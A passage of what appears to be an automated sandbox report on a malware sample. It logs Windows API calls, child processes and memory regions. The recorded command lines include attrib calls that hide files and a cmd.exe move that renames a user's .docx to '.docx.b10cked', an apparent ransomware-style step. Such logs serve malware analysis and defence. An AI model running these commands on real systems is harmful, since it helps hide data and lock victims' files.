(_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.308] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.308] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x32, 
lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.309] GetFileType (hFile=0x4c) returned 0x1 [0133.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.309] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x32, lpOverlapped=0x0) returned 1 [0133.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.309] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.309] _close (_FileHandle=4) returned 0 [0133.309] FindNextFileW (in: hFindFile=0x390e90, lpFindFileData=0x1af15c | out: lpFindFileData=0x1af15c) returned 0 [0133.309] GetLastError () returned 0x12 [0133.309] FindClose (in: hFindFile=0x390e90 | out: hFindFile=0x390e90) returned 1 [0133.310] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0133.457] _close (_FileHandle=3) returned 0 [0133.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.458] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.458] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.458] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.458] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.458] SetConsoleInputExeNameW () returned 0x1 [0133.458] GetConsoleOutputCP () returned 0x1b5 [0133.458] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.458] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.458] exit (_Code=0) Process: id = "124" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166a0" os_pid = "0xba4" 
os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "121" os_parent_pid = "0xa44" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13006 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13007 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13008 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13009 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 13010 start_va = 0x3c0000 end_va = 0x3c6fff entry_point = 0x3c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13011 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13012 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13013 start_va 
= 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13014 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 13015 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13016 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13017 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13018 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13019 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 13020 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 13021 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13022 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13023 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13024 start_va = 0x76480000 end_va = 
0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13025 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13026 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13027 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13028 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13029 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13030 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13031 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13032 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13033 start_va = 0x190000 end_va = 0x257fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 13034 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13035 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 181 os_tid = 0xb60 Process: id = "125" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16660" os_pid = "0xb38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "121" os_parent_pid = "0xa44" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13056 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13057 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13058 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13059 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 13060 
start_va = 0x7b0000 end_va = 0x7b6fff entry_point = 0x7b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13061 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13062 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13063 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13064 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 13065 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13066 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13067 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13068 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13069 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13070 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 13071 start_va = 0x6e440000 
end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13072 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13073 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13074 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13075 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13076 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13077 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13078 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13079 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 13080 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13081 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13082 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13083 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 13084 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13085 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 182 os_tid = 0xb34 Process: id = "126" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16660" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "121" os_parent_pid = "0xa44" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 
00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13086 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13087 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13088 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13089 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 13090 start_va = 0xdc0000 end_va = 0xdc6fff entry_point = 0xdc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13091 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13092 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13093 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13094 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 13095 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13096 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" 
Region: id = 13097 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13098 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13099 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 13100 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 13101 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13102 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13103 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13104 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13105 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13106 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: 
"c:\\windows\\system32\\advapi32.dll") Region: id = 13107 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13108 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13109 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13110 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13111 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13112 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13113 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 13114 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13115 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 183 os_tid = 0xb44 Process: id = "127" image_name = 
"cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xc4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13133 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13134 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13135 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13136 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 13137 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13138 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13139 start_va = 0x77470000 end_va = 0x77470fff entry_point = 
0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13140 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13141 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 13142 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13274 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13275 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13276 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13277 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 13278 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 13279 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13280 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13281 start_va = 0x76480000 end_va = 0x76489fff entry_point = 
0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13282 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13283 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13284 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13285 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = 